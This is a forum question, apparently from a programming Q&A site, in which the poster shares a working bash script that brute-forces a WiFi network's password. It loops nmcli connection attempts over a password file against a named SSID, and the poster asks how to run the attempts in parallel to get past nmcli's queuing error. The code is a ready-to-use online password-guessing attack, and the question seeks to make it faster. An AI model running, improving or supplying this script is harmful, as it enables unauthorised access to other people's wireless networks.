# Nmcli connect to a wifi network with multiple threads

Tags: bash, nmcli

I recently discovered that we can establish a connection to a WiFi network directly from the command line interface (CLI) using nmcli. This led me to wonder whether we could utilize it to develop a brute-force script. The provided code snippet exemplifies the typical procedure I aim to accomplish.

```bash
connect_to_wifi() {
    local ssid="$1"
    local password="$2"
    
    echo -e "\e[92mTrying Password: $password\e[0m"
    # Establish connection to WiFi network using nmcli
    sudo nmcli device wifi connect "$ssid" password "$password" > /dev/null 2>&1

    # Check connection status
    if [ $? -eq 0 ]; then
        echo ""
        echo -e "\e[33mSuccessfully connected to $ssid with password $password\e[0m"
        exit 0
    else
        return 1
    fi
}

bruteforce_wifi() {
    local ssid="$1"
    local password_file="$2"

    # Verify if SSID is provided
    if [ -z "$ssid" ]; then
        echo "Error: SSID is empty."
        exit 1
    fi
    
    # Use default password file if not specified
    password_file="${password_file:-pass.txt}"

    # Check existence of file
    if [ ! -f "$password_file" ]; then
        echo "Error: File $password_file not found."
        exit 1
    fi
        
    # Read passwords from file and attempt WiFi connection
    while IFS= read -r password; do
        connect_to_wifi "$ssid" "$password"
    done < "$password_file"
}
```

The `bruteforce_wifi` function now enables initiating a brute-force attack on the desired SSID, such as `bruteforce_wifi Denbroadband pass.txt`. This command executes successfully, sequentially trying each password one by one.

However, encountering an issue when attempting to implement threading:

```bash
sudo nmcli device wifi connect Denbroadband password 238112120 & # '&' is used to place it in the background
sudo nmcli device wifi connect Denbroadband password 329814298
```

The output from the second command states: `Error: Connection activation failed: New connection activation was enqueued.`

I am curious to explore potential workarounds to rectify this issue. Additionally, if someone questions why not capture the handshake and crack it through a brute-force attack later, it's worth noting that my curiosity lies in understanding whether conventional brute-force methods are feasible on WiFi networks without relying on handshakes.